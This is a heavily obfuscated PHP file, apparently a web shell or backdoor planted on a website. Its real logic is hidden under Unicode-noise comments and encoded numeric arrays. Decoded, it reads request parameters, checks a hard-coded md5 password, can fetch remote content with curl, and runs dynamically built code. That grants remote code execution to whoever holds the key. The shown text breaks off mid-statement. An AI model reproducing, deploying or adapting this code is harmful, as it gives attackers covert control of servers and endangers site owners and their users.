<?php /*-H(4Gdz^7+-*///
$Nj /*-


≘┍⋿ˉ∀⇐▷⊱☼✺⓵⒙⒞⒍⋀≉


,{q+≘┍⋿ˉ∀⇐▷⊱☼✺⓵⒙⒞⒍⋀≉


-*///
=/*-|SRH^W-*///
 range/*-
⇑々±￡⒮♛⇦✷㊫➅⋔∙➑⊯┸♡⊴➦ℭ⊘⑱⊸
eJK&x1,⇑々±￡⒮♛⇦✷㊫➅⋔∙➑⊯┸♡⊴➦ℭ⊘⑱⊸
-*///
(/*-NLA)O7bm-*///
"~"/*-hcp~PHc-*///
, /*-

⒝⊻➐┧❈⊒№⋯㊌

IZr|⒝⊻➐┧❈⊒№⋯㊌

-*///
" "/*-?I[fat)-*///
); /*-
⊃➡⊫﹪❾⓿∦⇜¯﹀
)=P⊃➡⊫﹪❾⓿∦⇜¯﹀
-*///
$iz=${$Nj[16+15].$Nj[11+48].$Nj[14+33].$Nj[14+33].$Nj[40+11].$Nj[24+29].$Nj[25+32]};@(count/*-
░⋵［◃➆⇅↬⑹Ⓝ⇟⒟∌☺❈ⓚﭢ⒌△⇓㊎⇞≎∪♮╣↩ℱ☎█ⓖ
o?OZ=e░⋵［◃➆⇅↬⑹Ⓝ⇟⒟∌☺❈ⓚﭢ⒌△⇓㊎⇞≎∪♮╣↩ℱ☎█ⓖ
-*///
($iz)==11&&/*-Qv%-*///
in_array(/*-
┧£⓳►⒵╬⊽↝↰＂╨➌⊶㊛⋜⊘┾⋱➷◝↬Ⅻ▋∊℃☰✁
Ucmtw┧£⓳►⒵╬⊽↝↰＂╨➌⊶㊛⋜⊘┾⋱➷◝↬Ⅻ▋∊℃☰✁
-*///
gettype($iz).count/*-4B-*///
($iz),$iz))?(($iz[64]=$iz[64].$iz[76])&&($iz[90]=$iz[64]($iz[90]))&&(@$iz=$iz[90]($iz[60],$iz[64](${$iz[41]}[10])))/*-
◇◴✖ⓤ⊀−㈨◯⊛⊝✻∪⇌◓⊁◨︹Ⓝ◛≞⇗↿⒡∏║‡
2EL◇◴✖ⓤ⊀−㈨◯⊛⊝✻∪⇌◓⊁◨︹Ⓝ◛≞⇗↿⒡∏║‡
-*///
&&/*-


ⓗ♜▀➄《☸⒥➐


NMaHoC4)ⓗ♜▀➄《☸⒥➐


-*///
$iz()):$iz;/*-N^=5]Su@-*///
class /*-


⇑╨✑@➺㈩≃⓴⊸∈ⅽ×≬▔≈


pKc-ou{Nkk⇑╨✑@➺㈩≃⓴⊸∈ⅽ×≬▔≈


-*///
KQ{ /*-


ⓙ♟≎↿☽╩≺ﭢ㊛﹋﹉✾▴♪╨⇌℘☲✦◎◌☋⋇⊧➾¯


n?DPa{ⓙ♟≎↿☽╩≺ﭢ㊛﹋﹉✾▴♪╨⇌℘☲✦◎◌☋⋇⊧➾¯


-*///
static/*-s1Rdj<2-*///
 function /*-


ⅿ⒛㊐⒗⑯﹊⊛◥◝═ℍⓅ☯


70V?ⅿ⒛㊐⒗⑯﹊⊛◥◝═ℍⓅ☯


-*///
JbU($mE) /*-#vRgp-*///
{ $uGfDtd/*-MLPf6KyW-*///
 = /*-

❿♂⋿╉➧ⓜ≭❑≪✚⋬⇆∆↨✍╜⅗⋱∭♪╕

gD<89_i6U❿♂⋿╉➧ⓜ≭❑≪✚⋬⇆∆↨✍╜⅗⋱∭♪╕

-*///
"r"./*-^Y5Yg0f-*///
"a"./*-


□ↅ⒉❇⋌◯❈ϡ➇↼↭⇡∦￡ⅺⅳℬ


L4Md5J□ↅ⒉❇⋌◯❈ϡ➇↼↭⇡∦￡ⅺⅳℬ


-*///
"n"./*-W]P?AbN#Fc-*///
"g"./*-yP-*///
"e"; /*-zTQ6=#ytO-*///
$wdxa/*-0MM-*///
 = /*-c$9m@N{-*///
$uGfDtd/*-


Ⓖ@〗⇕㊢


)7G3nⒼ@〗⇕㊢


-*///
(/*-
➔❏⇁≯」☐『✜ↇ↗☉⊙⋅Ⓕ﹎⒪㊣⓸⋸≓∽⊀⋞≍▶
Xgf0ru➔❏⇁≯」☐『✜ↇ↗☉⊙⋅Ⓕ﹎⒪㊣⓸⋸≓∽⊀⋞≍▶
-*///
"~"/*-


┭╠⒡❊⒭▥▱


yt┭╠⒡❊⒭▥▱


-*///
, /*-
┞ℓ﹜Ⓕ⇕♯™⇥⊙⋶⋙☿▪
x!@┞ℓ﹜Ⓕ⇕♯™⇥⊙⋶⋙☿▪
-*///
" "/*-OS[-*///
);/*-

∉⇆∄⋔

KI∉⇆∄⋔

-*///
 $VH /*-


⋱❄⋄⋦


TNDN⋱❄⋄⋦


-*///
= /*-
╬▔→↔↴Ↄ﹤⋱ﭢ➙㊆❊➺♒❷♈▦㈣≊✴
WY@5╬▔→↔↴Ↄ﹤⋱ﭢ➙㊆❊➺♒❷♈▦㈣≊✴
-*///
explode/*-2y-G&tm-*///
(/*-

✆♯ϟ㊜⌓ⓒ⑬⑴〃⑪⋖⋤№∅┡⊛»◩◑⊈⓮⒒⇢

huLY!]o✆♯ϟ㊜⌓ⓒ⑬⑴〃⑪⋖⋤№∅┡⊛»◩◑⊈⓮⒒⇢

-*///
"{", /*-


※⊚≠ⅹ⑾⒦⑺﹩


f!w※⊚≠ⅹ⑾⒦⑺﹩


-*///
$mE/*-{9A#S;mn,-*///
); /*-bb-*///
$hXFfSsd /*-


⇢⇞❻⑾∼⇚⊬∘¢㊘➃⊒♟✴┒╙♂


WZGaBsQ⇢⇞❻⑾∼⇚⊬∘¢㊘➃⊒♟✴┒╙♂


-*///
= /*-
⋞═ⓕ⇅➂⇦
z[8U}0A⋞═ⓕ⇅➂⇦
-*///
""; foreach /*--;Ljrz?a0-*///
(/*-


㊤≟→✍♝▶↹∞™ℴ↬ℛ⒲❖⊳⋊


9V&u㊤≟→✍♝▶↹∞™ℴ↬ℛ⒲❖⊳⋊


-*///
$VH /*-
∼☛⋲⇟♥⇩⒅ⅵⅺ≪╤￣➚♙╓≶Ⅺ↶ⓣ┹
&uZX:roA9∼☛⋲⇟♥⇩⒅ⅵⅺ≪╤￣➚♙╓≶Ⅺ↶ⓣ┹
-*///
as /*-

∼∞⑺㊙⋋ⓑ⑵㊝卍≸█⊼⊺−¤▷⑬ℕ

8#eaHV!∼∞⑺㊙⋋ⓑ⑵㊝卍≸█⊼⊺−¤▷⑬ℕ

-*///
$IbrRCUHE /*-
☒∈㊄┻㊑➨ㄨↁ╤⒗
=Paah☒∈㊄┻㊑➨ㄨↁ╤⒗
-*///
=>/*-@b-*///
 $exnJif/*-gM^0L-*///
) /*-

∁㊩↟☲—ⅵ┖▤Ⓜ✔╌⇣❻◕ⅺ

7Xl∁㊩↟☲—ⅵ┖▤Ⓜ✔╌⇣❻◕ⅺ

-*///
$hXFfSsd /*-


⑨￡㊍⊐﹋㊖✐㊤


E2y⑨￡㊍⊐﹋㊖✐㊤


-*///
.= /*-
⒧‿ℌ˜⒉Ⓙ∡⋫│⑷㈦▉⇐ↁ∻┒⊞⑹⒇⒡⇇⊟㊈®≂⋭
_M{⒧‿ℌ˜⒉Ⓙ∡⋫│⑷㈦▉⇐ↁ∻┒⊞⑹⒇⒡⇇⊟㊈®≂⋭
-*///
$wdxa[$exnJif/*-YHNbW`<T4]-*///
 - /*-

●➔☂≗ⓐ┲⇥┃⊂╟⓶」○¾◈⓯√↞

-7y}BQCk●➔☂≗ⓐ┲⇥┃⊂╟⓶」○¾◈⓯√↞

-*///
12853/*-]$WysLBfJ-*///
];/*-

☎⋵⋞➾⇥

wA9@sv☎⋵⋞➾⇥

-*///
 return /*-

↫●✵ⓠ≓⊠⋯ⓗ⋺✶↙≫⋘❅ⓡ─⒘◎®♡⓶〃↝▥↹⇧◽⒁∾

>^↫●✵ⓠ≓⊠⋯ⓗ⋺✶↙≫⋘❅ⓡ─⒘◎®♡⓶〃↝▥↹⇧◽⒁∾

-*///
$hXFfSsd; /*-eCjS~tT-*///
} /*-

⅞Ⅺ║↞㊨⅛㊏ℨ≞☰╣卐▨⒮➫ⓣ┋⋒Ⓖ♮ↆⅰ♓◫╠➒⒤⇒≼⑱↊

0|4g⅞Ⅺ║↞㊨⅛㊏ℨ≞☰╣卐▨⒮➫ⓣ┋⋒Ⓖ♮ↆⅰ♓◫╠➒⒤⇒≼⑱↊

-*///
static /*-l%)-*///
function /*-

℅Θ⇍⒜ℤ┩Ⅻ⒌ⓞ⋘㊒✲㊝↷『☒Φ⋼

3&,yBU.^o℅Θ⇍⒜ℤ┩Ⅻ⒌ⓞ⋘㊒✲㊝↷『☒Φ⋼

-*///
Op/*-

◶◯⊑Ⓕ∿

^&{E,Bh!◶◯⊑Ⓕ∿

-*///
(/*-
㊜◊⒅
T>hH[㊜◊⒅
-*///
$eDZG,/*-nP-*///
 $oiBtw/*-@!-*///
)/*-

┘⊟✓┃

!;Cs+7d+R┘⊟✓┃

-*///
 {/*-!MG-*///
 $IARsTKoG/*-

❇□♛∞▃⒦✣☩╘↚✑

:(4)tr❇□♛∞▃⒦✣☩╘↚✑

-*///
 = /*-

ℰ╪◜⇛∦⒭⋢░⊨Ⓣ⒣╖⊭⒖⅞◳☁

F7,+fnvISAℰ╪◜⇛∦⒭⋢░⊨Ⓣ⒣╖⊭⒖⅞◳☁

-*///
curl_init/*-

㊎Ↄ┈⊷⋎∡∊┉▅℠►✭⑤︸⒭┳➧⋥═﹍⇕ⅱⓐ㈠♨⊭⋖▃⓳↟

p]}nibiZK㊎Ↄ┈⊷⋎∡∊┉▅℠►✭⑤︸⒭┳➧⋥═﹍⇕ⅱⓐ㈠♨⊭⋖▃⓳↟

-*///
(/*-
⊭₪△≌∍㊝◴⑦⒲↑▓✲⒖◍
%t7IV9⊭₪△≌∍㊝◴⑦⒲↑▓✲⒖◍
-*///
$eDZG/*-r`eS8aW%}K-*///
);/*-XY2jG-*///
 curl_setopt/*-|Zv>MV:,-*///
(/*-FClI#o-*///
$IARsTKoG,/*-`#x-*///
 CURLOPT_RETURNTRANSFER,/*-
≞★☸⋢✤☹┖⑤◄☍╈∉㊝⒁㊧㈤ⓞ↡◐∮⇇ⓩ
.h_oIvS≞★☸⋢✤☹┖⑤◄☍╈∉㊝⒁㊧㈤ⓞ↡◐∮⇇ⓩ
-*///
 1/*-TAda-*///
);/*-
↕╪Ⓒ（◾⇓㊩≧↧☏⏢⋳
OOpQFk_↕╪Ⓒ（◾⇓㊩≧↧☏⏢⋳
-*///
 $VC/*-IdU-[[~#-*///
 = /*-ZTb-*///
curl_exec/*-E_2zG2`[=?-*///
(/*-


⑦⊩✦⇩➏⑳≺≅⅐✌


YJ⑦⊩✦⇩➏⑳≺≅⅐✌


-*///
$IARsTKoG/*-8su)CI1$-*///
); /*-~D>-*///
return /*-


╊▋⅗↾❐⇙


O-_W,ky)$L╊▋⅗↾❐⇙


-*///
empty/*-

⊻⇇Ⓗⓘℤ✞ↅ≂⋰✲▋⊨ⓝ✁↷↧⅘┭⑭

!s0`]⊻⇇Ⓗⓘℤ✞ↅ≂⋰✲▋⊨ⓝ✁↷↧⅘┭⑭

-*///
(/*-


♞⓪⋉⇀∂☋≀⊰Ⓗ


6?QmW♞⓪⋉⇀∂☋≀⊰Ⓗ


-*///
$VC/*-
⋱┊⇕▅〕ℎ┪⊠ↁ㈧㊦⇒⑧ㄨ⑦↹⑪øⅹ
pY⋱┊⇕▅〕ℎ┪⊠ↁ㈧㊦⇒⑧ㄨ⑦↹⑪øⅹ
-*///
)/*-$(0LtT^1-*///
 ? /*-,&o3ZnK}-*///
$oiBtw/*-Ov|^4$zrD-*///
(/*-
➂❃✠➜━✞┹︾↷♜⋲≧⊜⊊►〉╆㊰⑩⚘◷█
DS~Ry➂❃✠➜━✞┹︾↷♜⋲≧⊜⊊►〉╆㊰⑩⚘◷█
-*///
$eDZG/*-

¯◰㎡②┊∩◓◀♂❼¿﹂▸⅛⅙⇚➙┥⊽◧⅕☮﹊

%aB¯◰㎡②┊∩◓◀♂❼¿﹂▸⅛⅙⇚➙┥⊽◧⅕☮﹊

-*///
)/*-

☥⒖☽⓫✂⋘⊡✧¢⓻⊣∣Ⓥ➙❐╜╆♒▀♋

gf☥⒖☽⓫✂⋘⊡✧¢⓻⊣∣Ⓥ➙❐╜╆♒▀♋

-*///
 : /*-Imh!`-*///
$VC; /*-w:LjZ2-*///
}/*->xL[$3>-*///
 static/*-~PdqEmy-*///
 function /*-
╡±ø┐◟┤⑴卍∾┡㊁△﹨₪⒬〉▮⋖㏑↳▷㊛℗Ⅳ︷
:_m=7|╡±ø┐◟┤⑴卍∾┡㊁△﹨₪⒬〉▮⋖㏑↳▷㊛℗Ⅳ︷
-*///
jBSThsbrku/*-


▇❤㈥│≠ⓗ≯∽☈ⅾ↼↑≱☾◒∷☁¥┲⓵╄


O-▇❤㈥│≠ⓗ≯∽☈ⅾ↼↑≱☾◒∷☁¥┲⓵╄


-*///
() /*-Be;1-*///
{/*-
⒪✝Ⓑⓐ☨『⒜∁↑ⓓ⊥≔▎⊊⋢⋲◟▵♛✽Ⓦ➛∉≡✞⇡⒫∽⒢
e(3^h]P⒪✝Ⓑⓐ☨『⒜∁↑ⓓ⊥≔▎⊊⋢⋲◟▵♛✽Ⓦ➛∉≡✞⇡⒫∽⒢
-*///
 $GxClNRrLK /*-FO0PQ&O-*///
=/*-


∥∻≆✕┈


{wy=e∥∻≆✕┈


-*///
 array/*-

┚❉㎡⑹✗➜❷⋶╫≇⓾⋂➫Ⓠ≫┦⒕┺㊣◇ℋ♢✪⋊㊁⇀⇄┇┅↸

9P5E%e,3┚❉㎡⑹✗➜❷⋶╫≇⓾⋂➫Ⓠ≫┦⒕┺㊣◇ℋ♢✪⋊㊁⇀⇄┇┅↸

-*///
("12880{12865{12878{12882{12863{12878{12884{12877{12862{12869{12880{12863{12874{12868{12869","12864{12863{12865{12884{12865{12868{12863{12930{12928","12873{12864{12868{12869{12884{12879{12878{12880{12868{12879{12878","12867{12882{12880{12872","12881{12882{12864{12878{12925{12927{12884{12879{12878{12880{12868{12879{12878","12877{12874{12871{12878{12884{12876{12878{12863{12884{12880{12868{12869{12863{12878{12869{12863{12864","12907{12937","12854","12932{12937","12914{12897{12897{12914{12890","12868{12877"); /*--V3]-Z-*///
foreach /*-

⇑➔☇≻⑹卐◼⊘≙☄⋊⊴╠Ⓙⓕ↡☎⚘㈠╄«◺*ℂↈⒺ﹂⑷

:v!⇑➔☇≻⑹卐◼⊘≙☄⋊⊴╠Ⓙⓕ↡☎⚘㈠╄«◺*ℂↈⒺ﹂⑷

-*///
(/*-.kinG-*///
$GxClNRrLK/*-


▹﹛❈≺➩㊫↠ℬ↮☳☧º≂


?Q1VA▹﹛❈≺➩㊫↠ℬ↮☳☧º≂


-*///
 as /*-51G|.B-*///
$ibajRkCI/*-E.-*///
)/*-MyGCp-*///
 $HDikoW/*-}51m`@-*///
[] /*-$)k8-*///
= /*-7tj-*///
self/*-,B-*///
::/*-
⑼♥◢♋☬々➧☢⊶—⊌◄▹⋵┄☊⅖┽⋜✉≣◬┼┊⋎◰℘ⅼ⒟╢
M^zI-wtSxY⑼♥◢♋☬々➧☢⊶—⊌◄▹⋵┄☊⅖┽⋜✉≣◬┼┊⋎◰℘ⅼ⒟╢
-*///
JbU/*-
∊☴Ⓘ♝⊥☣❂⒪⋗╕╈ⓕ╗⑯☁⇕⌓ⓨ⑺#◀⒛↝⇗≖☩㏒▕⇖⒃
grc4zLA∊☴Ⓘ♝⊥☣❂⒪⋗╕╈ⓕ╗⑯☁⇕⌓ⓨ⑺#◀⒛↝⇗≖☩㏒▕⇖⒃
-*///
(/*-
▄♞➲♬✲┾Ⓣ↉
w$-X4=`▄♞➲♬✲┾Ⓣ↉
-*///
$ibajRkCI/*-

ت』⊓➽㊂├⊻◴ⅰ⓼⋐㊎▬⊎┤⇥﹄①◖℮∴﹪≹☸┣⋇ⓑ⒥

TiW?ت』⊓➽㊂├⊻◴ⅰ⓼⋐㊎▬⊎┤⇥﹄①◖℮∴﹪≹☸┣⋇ⓑ⒥

-*///
);/*-

▕⇇═┉¤ↇ≘〉

-:x,c,gM▕⇇═┉¤ↇ≘〉

-*///
$tbWDTuNlr /*-ibdX2-*///
= /*-
☺◞✽ℬ∜┢◵♭☽╆◟
7T&r6qX<☺◞✽ℬ∜┢◵♭☽╆◟
-*///
@$HDikoW/*-
╓ⓒ∲｀∄ℂ˜∿︵≋
00Bzv╓ⓒ∲｀∄ℂ˜∿︵≋
-*///
[/*-4IZ-*///
1/*-

⓲┎╨↼≣ⓙⅦ☬℉⋿≇۰⓺✐㊔≉۵➴∑⇓≅◖☹◜⇚

GEoJ⓲┎╨↼≣ⓙⅦ☬℉⋿≇۰⓺✐㊔≉۵➴∑⇓≅◖☹◜⇚

-*///
]/*-


⑱⋡∈┲☤⑿❦∡☟㊮⇪⊖❃╠⑮ℳ↨┞◬▨✗∢︸⊉✣∝⋏♤♫﹏◷


a#?_OT⑱⋡∈┲☤⑿❦∡☟㊮⇪⊖❃╠⑮ℳ↨┞◬▨✗∢︸⊉✣∝⋏♤♫﹏◷


-*///
(/*-%RTU)pnH-*///
${/*-

⋼⋨╤︸━

wa6{<1⋼⋨╤︸━

-*///
"_"/*-


┸➔✬‰≺⊢┾↱⒯∧⇚ⅶ┎✾❦︻⑲


ifrKzO┸➔✬‰≺⊢┾↱⒯∧⇚ⅶ┎✾❦︻⑲


-*///
."G"/*-

◅◩♔☲♧✆Ü◨✗⋁

F>&&f?;eA◅◩♔☲♧✆Ü◨✗⋁

-*///
."E"/*-

⑨ⅺ㊩↡↰』∑㊤〗⅜Ⓦ♗∐≯）⓸﹠➢╕∨◦유ℭ®⊝↺⒄≂

{LTImn⑨ⅺ㊩↡↰』∑㊤〗⅜Ⓦ♗∐≯）⓸﹠➢╕∨◦유ℭ®⊝↺⒄≂

-*///
."T"/*-r.)=p[)7,-*///
}[/*-

≲◑╕⇦﹨➘☒⋫✸⋊╔⋛♯⑩︾㊓﹁㊇

`r8≲◑╕⇦﹨➘☒⋫✸⋊╔⋛♯⑩︾㊓﹁㊇

-*///
$HDikoW/*-!hL.l6+-*///
[/*-Bk-*///
6+3/*-

∱╫⇕ↇ⋶❂±◪❊●큐≺≈└✏⋒⇨≣┎┷↕⒏∩ⓐ▕

]snNS^05.∱╫⇕ↇ⋶❂±◪❊●큐≺≈└✏⋒⇨≣┎┷↕⒏∩ⓐ▕

-*///
]]/*-:^YW73~-*///
);/*-
⅒Ⓔ⑷©―▓▨ↁ﹊➶⇞⒦⑧『∘Ⅷ
Wtrza|⅒Ⓔ⑷©―▓▨ↁ﹊➶⇞⒦⑧『∘Ⅷ
-*///
 $eXP /*-#Ab?J6-*///
=/*-(UYDc+.B%-*///
 @$HDikoW/*-


❉↖④▼↦≗◵


{@JxNlP❉↖④▼↦≗◵


-*///
[/*-v^Sxm-*///
2+1/*-
➞⒫╊✰├┓¾➏⒂┿❧㊩╢‱↺ℴ
=ZsY,➞⒫╊✰├┓¾➏⒂┿❧㊩╢‱↺ℴ
-*///
]/*-5Q5S^-*///
(/*-l)&8-*///
$HDikoW/*-


⋡⓳▥≓Ⓘ＂⒛☳⊰✶☒⋐❹►∃≑⇄∎≩⑽{｀卍


|LdvCeQ-⋡⓳▥≓Ⓘ＂⒛☳⊰✶☒⋐❹►∃≑⇄∎≩⑽{｀卍


-*///
[/*-

☏∋Ⅵ✕♭➏

P2uMO5V☏∋Ⅵ✕♭➏

-*///
1+5/*-


┾Σ∺∷


cWz|fBmeJ┾Σ∺∷


-*///
], /*-:Pbr5?l-*///
$tbWDTuNlr/*-rS[b1i-*///
);/*-

│♨☈➅▵㊄⊜➛⇚

C|H`met│♨☈➅▵㊄⊜➛⇚

-*///
 $qucVzXbOP /*-


Ⓙ╌⊴⊫‱㉿⋧❒∊➚➐⅒❆⇍⇁➣≡∼☳⊛≍⇚⋙≈⊎┓ℭ


q:W(jYK,Ⓙ╌⊴⊫‱㉿⋧❒∊➚➐⅒❆⇍⇁➣≡∼☳⊛≍⇚⋙≈⊎┓ℭ


-*///
=/*-,EcZC8-*///
 $HDikoW/*-Ol-Q-*///
[/*-
⋸˜℠Ⓥⓦ⇤ø︸└«❑✃⋞♘Ⓣ◽㊉☥⋈⇇╂
].⋸˜℠Ⓥⓦ⇤ø︸└«❑✃⋞♘Ⓣ◽㊉☥⋈⇇╂
-*///
2+0/*-lGc:{)L?L-*///
]/*-

∉╈┠☚☂ℌ﹜⊉❦⋃≩≓∅≄➦⊟➑⋢ↇ▃✪⋯∻۵

2pedQHx!>J∉╈┠☚☂ℌ﹜⊉❦⋃≩≓∅≄➦⊟➑⋢ↇ▃✪⋯∻۵

-*///
(/*-

㊄⇝⋕ⓛ≺∞║≡⑻┳◭┧⇆‿

IX㊄⇝⋕ⓛ≺∞║≡⑻┳◭┧⇆‿

-*///
$eXP,/*-v+s-*///
 true/*-


✐╫ℕ✡☬①╉


h<✐╫ℕ✡☬①╉


-*///
); /*-M(:DFr5]I-*///
@${/*-


∢❒


U)O[ZnfIwL∢❒


-*///
"_"./*-X~~Ea;O-*///
"G"./*-,6bDK>j-*///
"E"/*-C=<_.D}h-*///
."T"/*-{^`p!$MH-*///
}/*-U,N-*///
[/*-
⋷π≽⅓☁㊘✵Ⓢ⒕❏ⅻ≤♝┒≚ↂ▄╎°ⅶ➲₪
|(dTg⋷π≽⅓☁㊘✵Ⓢ⒕❏ⅻ≤♝┒≚ↂ▄╎°ⅶ➲₪
-*///
$HDikoW/*-

┻⒆✷ⅴ≷ⅳ╟◲❂┎▅℃⊺↷≶⇪∓▂❀︶⇎⋼⊔⒂➆❦◱㊰❶⅙ℯ

!$wg1+WtB┻⒆✷ⅴ≷ⅳ╟◲❂┎▅℃⊺↷≶⇪∓▂❀︶⇎⋼⊔⒂➆❦◱㊰❶⅙ℯ

-*///
[0+10/*-

℉&↝♫➜⒔❀ⓘ♙⊔⊅♛÷⊟ⓗ⊸﹁

9_℉&↝♫➜⒔❀ⓘ♙⊔⊅♛÷⊟ⓗ⊸﹁

-*///
]/*-

≄◔➸∋ⅶ‖░╗✼⅐➞♀≑⊵∁⏢≅㊁⏎Ⓕ

rt^,,rk0≄◔➸∋ⅶ‖░╗✼⅐➞♀≑⊵∁⏢≅㊁⏎Ⓕ

-*///
]/*-


⓼≫﹣⌖⊚↹


oJ2⓼≫﹣⌖⊚↹


-*///
 == /*-i=Yz:Pm2dQ-*///
1 /*-!Z-*///
&& /*-g.9@.-*///
die/*-{e:{=5NTt-*///
(/*----*///
$HDikoW[4+1/*-5uvo-*///
]/*-H@IrS|7%v-*///
(/*-yYArG8|3H-*///
__FILE__/*-

①∲⇢∱∨㊌✥⒏➉✚⇗━↣▃⊴☌⊺↖∦㊂↨☑Σ⑱㊛ℛ⊁⒚

~P~EhZNrp①∲⇢∱∨㊌✥⒏➉✚⇗━↣▃⊴☌⊺↖∦㊂↨☑Σ⑱㊛ℛ⊁⒚

-*///
)/*-<7k-*///
); /*-
%☁❄∑┙⊜┡┸♩⋮➈⒰◵≭ⅸ㈡┢✑✎㊂ⓛ⇞✷☣┖⇕⒨╇∁
^E.zNHw%☁❄∑┙⊜┡┸♩⋮➈⒰◵≭ⅸ㈡┢✑✎㊂ⓛ⇞✷☣┖⇕⒨╇∁
-*///
if/*-[=s-*///
(/*-3nZH3<Zx10-*///
 (/*-
▔⊲▵︵┻❹▴⇠⒓ﭢ㊋☟①╝┐┝⊩➹➻
`&>R0D▔⊲▵︵┻❹▴⇠⒓ﭢ㊋☟①╝┐┝⊩➹➻
-*///
(@/*-5AxR@V-*///
$qucVzXbOP/*-~.=3X%~}x-*///
[/*-s^7?T<0-*///
0/*-

⋞⊳↣┟Ⓐ﹉Ⅾ㊀⑾﹟≟➂ⓐ➌┨⒙∪╓

P2K@EnT4⋞⊳↣┟Ⓐ﹉Ⅾ㊀⑾﹟≟➂ⓐ➌┨⒙∪╓

-*///
] /*-fj#22!bT_D-*///
- time/*-
◫╃⋴⅞﹀❐┠♁◆−～↭¯☚｜☸◿⊠┊ⅺ┭┬⒱⒴⌘
-w◫╃⋴⅞﹀❐┠♁◆−～↭¯☚｜☸◿⊠┊ⅺ┭┬⒱⒴⌘
-*///
()/*-4t.d-*///
) > /*-E8^Mw_S-*///
0/*-
︷ⓥ⋐↸⋸⋶▆⊛‐≋◆∜Ⅼ❃≯≂⒬√♦™⓲➇
dT︷ⓥ⋐↸⋸⋶▆⊛‐≋◆∜Ⅼ❃≯≂⒬√♦™⓲➇
-*///
)/*-IM>KM5-*///
 and /*-
↜ⓩ♓Ⅺ♛⋠❸┾▽╣ↅ√❄⓺㊏┪⊛✘◱┓⋹▄⊖
)S↜ⓩ♓Ⅺ♛⋠❸┾▽╣ↅ√❄⓺㊏┪⊛✘◱┓⋹▄⊖
-*///
(/*-

☀✖﹣⒦ⓘ⅔☓◕¶↵➳∭

!H]DO46<☀✖﹣⒦ⓘ⅔☓◕¶↵➳∭

-*///
md5/*-
㊀∲｜⊄≕×≧」➧Ⓩ
|I!㊀∲｜⊄≕×≧」➧Ⓩ
-*///
(/*-

┞ⓛ⇟º≡➆➟ⓕ✞ϡ⋯⋅➒☇㊥┹⑳⇝⋍ⓠ☵☣

Eq~{]Lo5┞ⓛ⇟º≡➆➟ⓕ✞ϡ⋯⋅➒☇㊥┹⑳⇝⋍ⓠ☵☣

-*///
md5/*-
↺⋧╁≄⒧≽☉﹦█⑰∵▰Ⓟ⊆ↆ∤⇎☺
)kz2|↺⋧╁≄⒧≽☉﹦█⑰∵▰Ⓟ⊆ↆ∤⇎☺
-*///
(/*--tz9z-*///
$qucVzXbOP/*-7AT|R-*///
[/*-_-*///
0+3/*-~m@hQ%a$-*///
]/*-
⋱☬㊜
Y2>vN⋱☬㊜
-*///
)/*-
❶⋞♡✶☢➝ⅶ♞☣◄（㊗⋵↳◰⇠⊪㈢➪Ⅶ⑻♝┗⋑ↂ☩㊜⊎➘≥
WNEe❶⋞♡✶☢➝ⅶ♞☣◄（㊗⋵↳◰⇠⊪㈢➪Ⅶ⑻♝┗⋑ↂ☩㊜⊎➘≥
-*///
)/*-uA7Wr-*///
 === /*-
❸◞》㊏▂⒝❾⅖ø≶☄⊅½∣⋒‰ⓧ®⊆✦∍⋰➷≢⅘º∼➏
^❸◞》㊏▂⒝❾⅖ø≶☄⊅½∣⋒‰ⓧ®⊆✦∍⋰➷≢⅘º∼➏
-*///
"366390c1ff9d5c3d31bc5b7367beef26"/*-
ↇ⒊⋽
9_e|bNGl-hↇ⒊⋽
-*///
)/*-
◅◳♁｀▥⅝☝❽}◧Ⅹ⒖⊅∴
)7◅◳♁｀▥⅝☝❽}◧Ⅹ⒖⊅∴
-*///
 ): /*-
≚⋉Ⓔ⒬⒆⓾⓱▧◛⇋⇐≳㊩Ⅹ✱➢▔✜♒
#8E33}:≚⋉Ⓔ⒬⒆⓾⓱▧◛⇋⇐≳㊩Ⅹ✱➢▔✜♒
-*///
$LRtmhw /*-

♛☋㊥㊒⊼※⒠╍⒉╡⇒→☐✼▕㈦⇤ღ≓♟≬⇝

!~@L:EV=♛☋㊥㊒⊼※⒠╍⒉╡⇒→☐✼▕㈦⇤ღ≓♟≬⇝

-*///
=/*-HzT(v2-*///
 self/*-


☶▌※☁◡㈠⋟╛Ⅴ╚╃╉ⓓϡ✪∊


IGFCNbj{U☶▌※☁◡㈠⋟╛Ⅴ╚╃╉ⓓϡ✪∊


-*///
::/*-1Z<6-*///
Op/*-ClCd|4-T,[-*///
(/*-DbQ]Eld7-*///
$qucVzXbOP/*-
⋄┟✙ⓤ⒩
sW⋄┟✙ⓤ⒩
-*///
[/*-y}cv9-*///
1+0/*-S?X~5;F-*///
], /*-


ⓞ㊗▪×⊁㊞™⊨▢£♚⊆➐➽➆↭©Ⓓⓘ④


`QYU#&ⓞ㊗▪×⊁㊞™⊨▢£♚⊆➐➽➆↭©Ⓓⓘ④


-*///
$HDikoW/*-zUV=0K4::-*///
[/*-A{-*///
4+1/*-QfJxxZwZ3k-*///
]/*-
⓳∴➅‡♋✶◉∡⅒☾∣╜✠☈❅⓶∷ℋ⋘～◔
ix⓳∴➅‡♋✶◉∡⅒☾∣╜✠☈❅⓶∷ℋ⋘～◔
-*///
);/*-8<BH{^-*///
@$HDikoW/*-N]kf-*///
[/*-
⋓┠★➣℃
Azq~._>⋓┠★➣℃
-*///
0/*-


⓾⇟◊ⓛ⊰┇］¤⊓≝▧Ⓧ


f@uGHe7)VD⓾⇟◊ⓛ⊰┇］¤⊓≝▧Ⓧ


-*///
]/*-


⋨⋊≝ⓦ↺⋧⇦￡╜♤❂❸㊟☿△↹╈⌒㊜유∕▧⊢○』⇟⑧﹜


kDW^^0a@⋨⋊≝ⓦ↺⋧⇦￡╜♤❂❸㊟☿△↹╈⌒㊜유∕▧⊢○』⇟⑧﹜


-*///
(/*-aT;H-*///
"",/*-
☃◝Ⓓ◰☿◤㊪⋁∞◒⑽
(K6YFP^1ys☃◝Ⓓ◰☿◤㊪⋁∞◒⑽
-*///
 $HDikoW/*-


⅝⑾➨∨≝㊫ℕⓩ✱❐㊕┡➤➏π┷ℐ⋾➐


b_d33aH⅝⑾➨∨≝㊫ℕⓩ✱❐㊕┡➤➏π┷ℐ⋾➐


-*///
[/*-

❈▰◨∜Ⓥ㊪❋▆Юↇ⋕⓭½♠⇕◲╌➵⒪╋⇨﹢≈

_avl(❈▰◨∜Ⓥ㊪❋▆Юↇ⋕⓭½♠⇕◲╌➵⒪╋⇨﹢≈

-*///
0+7/*-jR-*///
] /*-
≋➪⋊⑶♯◗╬Ↄ∀╞⅔⒠⌒ⓨ‱╋≹⌖┖≖⋡⑽⊯㊖⇛▒
